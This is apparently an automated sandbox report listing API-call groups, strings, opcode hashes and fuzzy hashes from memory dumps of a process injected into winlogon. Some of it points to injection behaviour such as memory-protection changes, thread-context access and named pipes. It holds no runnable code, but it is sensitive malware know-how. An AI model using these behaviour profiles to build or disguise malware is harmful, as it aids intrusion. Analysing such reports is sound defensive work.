                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: 9cdba6727cee948ec92796689e0fc12a033cc256fbb51a8d326bbfbcf46ff7c9
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: F731A539312E60B1FE15DF9AA80879963D4FB09BA6F398525DD2E87388DF38C446C300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: b56bf77e3d38014fe6abc0fe981c7fccbbcf30d686bcff1290ba8758a7f2f1e9
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: 2511C135324FA096E7509B9AE858319B3A0F388FE6F208224EA5D877A4CF7CC944C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: ff14af893957ffea3ab595c473683dca06a5ffb8dd3d70eb8a6ca617f63c2a3b
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: 5B118F25314F6096F7509B9AE84831973A5F788FE7F048224EA5D877A8DF78C944C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: e6aa45671075f40753d66a7eea4d3308441a16fac4b1c48fe7a6f7faecb46b0f
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: 2DD19C7A208F9895DA70DB5AE49835A77A0F7C8B89F144116EACD87BA9DF3CC541CF00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: 043bd55ba01abd2451815a23672e2e217f532292a58b40aff087af92420aa0a0
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 7031A469709F69E2EB25DF9EE94826977A0FB44F86F04C4309E4A07B54EF38C4A1C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: b457cad7c676fafc82753b1c6210a0d789cf7538bdb68c18cb7cab4602b27ae2
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 7131B169701F61A2EB55DF9AE80826973A1FB44F86F18C0309E4887B55EF38D8A1C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 258d30db1b86f1ee08310560d6057e4c708c8021364d2525115f470b83f8a513
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: 6C016D25314E51A6EB20DBA6A45C35973A1F788FC2F588835CE8A43754DF3DC985C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 42d9fa172b430958819c4ff7d7228036ea3807f12f409a3c11b57c6c254329aa
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: A7018065304E51A6EB10DB9AE45C35963A6FB88FC2F588035CF8D83754DE3DC985C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: a9f07ffff90aed63a477e6b5be0fa8bb21007e75bcb8cc0cc0795d7558385851
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: FC112D69625F64A6FB259FA9E40D716B7A0BB58F86F248834CD5947754EF3CC408C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 7e87ff89447f8c9844c9ab18e43472e70f8c6630eec8e89a1bfbab50abdafd68
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: 0B111769711F60A2EB249BA9E81D71A67A5BB48F87F148438CA5D47764EF3CC408C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction ID: d8b70030c570faa1b5d807255593d4be8cae63427be600f7cb8e87c94ce45865
                                            • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction Fuzzy Hash: 3A519F3A26DA20AAEB14DF99E44CB5A3799F344B99F50C560DE574778CDB35C842C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction ID: b1229b4797e63ac8a5cc894578b2046acdbc88e47101dd89d15c080535e2d269
                                            • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction Fuzzy Hash: 3451D33A725A20AAEB14CF99E44CB593795F784BAAF70C120DE5687B8CDB35DC42C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: f112a6754a55382dbfdf9b1daadc51079be1241575beae1d4f281bfb9662e5ad
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: F6F04F66318E51A2EB208BA9F49D39A6760F744F8AF94C030DA4947A64DF3CC688CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: f4a0d93a0200a0849846c65a0c243f4471c374eee0b62f1cad352672f2f24cd4
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: 67F04F66304E51A2EB209BA9F4D835A6761F744B8AF94C030DA4986A64DE3CC688CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: 3f87963079133cfab528efc465c2264cd1018eb2f7383f1bd84a27779a78dc6e
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 1AF0A72831CFA1A2EA008B9BB90D12A7220FB48FD2F18C531DE5B07B68CE3CC481C300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: 9f3233603028e0b1b86c801d2ec784eda29a394b14b1e0c9d5dc5afa3b3aeb40
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 93F03728318FA0B1EA148B9BB95D1196762FB48FD3F18D131DE9A47B69DE3CC545C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: d9b41130ff410577e9ff513638e825c8c1dfb14f427efc5cd3b7ef21c9094d7c
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 18F01269339F54B1EF555FE8E88C3652360EB48F92F64A469A50B46565DF38C488C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 5162326cd7fa2c510cfb1c91353f0321b0cbc9f36ba7700a1e62234b400715e1
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 7FF01269325E54B1EF548FE8E88C3652361EF48B93F54A42AA50B85665DF38C488CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: 9a801c7ccadc6eb3ff7e5ed26391364ae17ab8bbff456a3cc809a5239a07978d
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: 3E02D93A219F9496E760CB99F49435AB7A1F3C4795F204115EB8E87BA9EF7CC484CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: ee9ba1a2d261dc6c65b4e2d43ba4bb6869639d99bddb9c3186d9302fb3dd522e
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: 4281C03AA34E30A9FB509FEDD8887AD27A1F784B96F648116DE0A5379ADB34C441C310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: 03290832ff825d699a5c2b122fcc6245b8018cd8e6285e07660d15faaa856b3d
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: 9181C1BA710E34A9FB50AFED98583AD2BA2F784B87F54C516DE0A93792DB34C441C310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                            • Instruction ID: a4b7c35c2db1f1b914b8e8535d9430e2c3f20039a046fe468dad81212f6f9600
                                            • Opcode Fuzzy Hash: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                            • Instruction Fuzzy Hash: F161B83A51DFA4DAE760DB99E45831AB7A0F388B45F108155FA8E87BA8DB7CC540CF00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: f3e0eecdbf7d1ecc68755703d983f6d92ad5bf0be7b3d4789e27b32bced6994e
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: 4061EE3A519F90D6E764DB99E44831AB7E1F388B56F208115FA8D87BA8DB7CC440CF04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: e9220e0b73b1d97bc8ad9bb70746f7ec3aeed8aed2e016e4c1d481caacef4710
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 4B11C82FA5CE3121F7A411EDE55E3E990526B58376F58C634FB7716BDA8A388C42C200
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: da2733c5c8d00c9bee26e41522eed5cd81350da1459278537785505115084ab5
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: BB11082FA54E3023F7A591EDE45E3A911407F68776F48C634EB7706BDA8A388C42C203
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 9c3a901dbb96c7a6d5f7416683512413e85e2737f534a2496eaaa02b9f688107
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 6011822AA74E3162F6A815ECE55E36D11817B75376F39C624BAB7073D78B798C42C200
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 4999fd702e983ea01f22114a1bcd8f0d8673cf6f2ddc95b9751a18649ea2bf0c
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 3E11A52EA54E31B2F6A81DECE55E36911CB7B65377F08C624BA76063D79B788C42C200
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: 42adf252b2fdd566a487890801640a035baaf57411252a283d14ccc2d570c1fb
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 9311392A704F50A2EB149BA9F41866AB7A5FB88F86F148039DE8947794EF3DC508C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: c4eb3d63776d4055a531065f3b4a1210afd8ee410b87a796abb7a39806a070ee
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 9751CF3A713A60ABEF54CFADE848B193395F358B9BF52C224DA0647788EB34C841C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: b25bd1c368716a4e0e81f0a06a3d6b2adff4ec5042aaa9a6ae596e9c18bc936f
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 0051E33A312A20ABEB54DF6DE448B183795F358B9BF51CA24DA0663BC8EB34CC41C705
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 98add750b6747b53a7348f9af74011a36cd34dbe0a1de91b26c58f32e7b33695
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: D631C07A212A60AAEB54DF5AE84871977A4F748BDBF56C214AE4B07784CB38C940C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 4fb1426d4b0cbfc538e4fb8421eb22a2ed130e1c0ac3dd51622559385a3aac05
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 2B31C07A211A60AAEB54DF5AE848B1937A4F748BDBF05C614AE4A17BC4CB38CD40C705
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: e326b0d558216964c1bb90aba37888528c21a75a5d3d4e8eecd90829191c5857
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: 9211827A528FA4A2E765DFBAA84821AB770F789F85F148429DB8A03755DF38C051C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
